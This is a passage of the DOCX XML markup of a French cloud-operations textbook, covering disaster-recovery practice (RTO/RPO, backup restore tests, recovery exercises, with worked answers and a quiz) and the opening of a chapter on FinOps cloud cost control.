            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sauvegarde inutilisable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Bascule complète</w:t>
            </w:r>
          </w:p>
        </w:tc>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Trimestrielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Dépendances oubliées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Perte d'une zone</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Trimestrielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quorum et réplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Perte d'un opérateur</w:t>
            </w:r>
          </w:p>
        </w:tc>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Semestrielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Documentation insuffisante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CHRONOMÉTREZ TOUJOURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un exercice sans mesure ne prouve rien. Notez l'heure de départ, chaque étape et l'heure de retour à la normale. Le RTO réel est la seule valeur utile.</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LES SECRETS FONT PARTIE DE LA REPRISE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une base restaurée sans ses clés de chiffrement est une base illisible. Les clés, certificats et jetons doivent être récupérables indépendamment du site principal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>87.5 Ce qui échoue le plus souvent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les causes d'échec de reprise sont rarement techniques : ce sont des hypothèses non vérifiées sur l'état des dépendances externes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.343 — Quatre fausses assurances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34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Fausse assurance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Réalité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Parade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« Les sauvegardes sont automatiques »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Personne ne les restaure</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Test mensuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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 Le DNS bascule vite »</w:t>
            </w:r>
          </w:p>
        </w:tc>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TTL à 24 h</w:t>
            </w:r>
          </w:p>
        </w:tc>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TTL court vérifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« La région secondaire est prête »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quotas insuffisants</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Exercice réel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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 L'équipe connaît la procédure »</w:t>
            </w:r>
          </w:p>
        </w:tc>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Un seul expert</w:t>
            </w:r>
          </w:p>
        </w:tc>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Rotation et runbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois contrôles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Contrôles automatisés à programmer</w:t>
        <w:br/>
        <w:t># 1. La dernière sauvegarde date de moins de 24 h</w:t>
        <w:br/>
        <w:t>aws s3 ls s3://sauvegardes-app/ | sort | tail -1</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Le quota de la région secondaire couvre la production</w:t>
        <w:br/>
        <w:t>aws service-quotas get-service-quota --service-code ec2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --quota-code L-1216C47A --region eu-west-1</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3. Le certificat de secours est valide</w:t>
        <w:br/>
        <w:t>openssl x509 -enddate -noout -in secours.pem</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PRÉPARER UNE REPRISE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Faire écrire RTO et RPO par le métier.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Sauvegarder, puis restaurer pour vérifier.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Conserver une copie immuable hors site.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Rédiger un runbook avec durées et décideurs.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Chronométrer un exercice au moins chaque trimestre.</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RTO décrit la durée, RPO la perte de données.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sauvegarde non restaurée n'est pas une sauvegarde.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réplication ne protège pas d'une suppression logique.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copie immuable résiste à la suppression et au chiffrement.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reprise suit l'ordre des dépendances.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secrets font partie du plan de reprise.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exercice non chronométré ne prouve rien.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échecs viennent souvent des dépendances externes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le système survit aux pannes. Le chapitre suivant maîtrise ce qu'elles coûtent.</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87.1 — Définir RTO et RPO</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 service de réservation doit rester utilisable en haute saison.</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Interrogez le métier.</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Chiffrez les deux valeurs.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Déduisez l'architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 87.2 — Vérifier une sauvegarde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   FIABILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une sauvegarde quotidienne existe depuis un an.</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Restaurez-la ailleurs.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Comparez les compteurs.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Consignez le résultat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 87.3 — Préparer un exercice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La direction demande une preuve de reprise annuelle.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Écrivez le scénario.</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Fixez les mesures.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Prévoyez le compte rendu.</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87.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RTO : 1 h (au-delà, les clients appellent)</w:t>
        <w:br/>
        <w:t>RPO : 5 min (au-delà, des réservations sont perdues)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Conséquence : sauvegarde continue des journaux + réplique chaude</w:t>
        <w:br/>
        <w:t>dans une seconde zone + bascule DNS automatisée.</w:t>
        <w:br/>
        <w:t>Une simple sauvegarde quotidienne ne suffit pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un RPO de cinq minutes interdit la sauvegarde nocturne seule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le RTO impose une réplique déjà prête, pas une reconstruction à froid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 87.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>latest=$(aws s3 ls s3://sauvegardes-app/ | sort | tail -1 | awk '{print $4}')</w:t>
        <w:br/>
        <w:t>aws s3 cp "s3://sauvegardes-app/$latest" /tmp/restauration.dump</w:t>
        <w:br/>
        <w:br/>
        <w:t>createdb verif</w:t>
        <w:br/>
        <w:t>pg_restore --dbname=verif --no-owner /tmp/restauration.dump</w:t>
        <w:br/>
        <w:t>psql -d verif -c "SELECT count(*), max(creee_le) FROM commandes;"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparer avec la production</w:t>
        <w:br/>
        <w:t>psql "$DATABASE_URL" -c "SELECT count(*), max(creee_le) FROM commandes;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le nombre de lignes et la date du dernier enregistrement donnent une idée du RPO réel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une restauration qui échoue doit être traitée comme un incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 87.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## Exercice de reprise — 2026-11-14</w:t>
        <w:br/>
        <w:t>Scénario : perte de la zone eu-west-3a</w:t>
        <w:br/>
        <w:t>Durée maximale : 3 h</w:t>
        <w:br/>
        <w:t>Mesures : heure de détection, heure de bascule, heure de retour à la normale</w:t>
        <w:br/>
        <w:t>Participants : astreinte, responsable produit, un observateur</w:t>
        <w:br/>
        <w:br/>
        <w:t>Livrables :</w:t>
        <w:br/>
        <w:t>- chronologie horodatée</w:t>
        <w:br/>
        <w:t>- écarts entre le runbook et la réalité</w:t>
        <w:br/>
        <w:t>- trois actions correctives avec propriétaire et date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un observateur extérieur note les faits sans participer : c'est la seule façon d'obtenir une chronologie fiable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les écarts entre runbook et réalité sont le vrai résultat de l'exercice.</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 mesure le RPO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La durée d'indisponibilité</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La perte de données acceptable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 débit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 coût</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Pourquoi une réplication ne suffit-elle pas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Trop lente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Elle propage les suppressions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Trop chère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Elle ne fonctionne pas</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À quoi sert un verrou d'objet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Accélérer la restauration</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Empêcher la suppression d'une sauvegarde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Chiffrer les données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Compresser</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Quel est l'ordre de reprise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Applications puis réseau</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Réseau, identité, données, services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Données puis DNS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Au hasard</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 prouve un exercice de reprise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Que le plan est parfait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 RTO réel et les écarts du plan</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Que rien ne peut échouer</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La conformité</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C'est la fenêtre de données que l'on accepte de perdre.</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La suppression est répliquée comme le reste.</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Il rend la copie immuable pendant la durée choisie.</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Chaque couche dépend de la précédente.</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Il révèle les dépendances oubliées et le temps effectif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>88. FinOps : maîtriser le coût du cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rendre la dépense visible, attribuable et proportionnée à la valeur produite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 87</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Lire une facture cloud sans se tromper de coupable.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Étiqueter les ressources pour attribuer les coûts.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Distinguer économie réelle et report de coût.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Dimensionner et réserver sans se bloquer.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Installer un rituel de pilotage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>88.1 Le coût suit l'architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La facture cloud n'est pas un problème comptable : c'est le reflet des choix techniques. Une architecture qui transfère des téraoctets entre zones ou qui garde des instantanés pour toujours coûte cher, quelle que soit la remise négociée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.344 — Cinq postes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83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Poste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Levier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Calcul</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Instances et pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dimensionnement, arrêt, réservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>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Volumes et objets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Cycle de vie, compression</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseau sortant</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Transferts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache, colocalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Bases managées</w:t>
            </w:r>
          </w:p>
        </w:tc>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Instances et stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Type, sauvegardes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
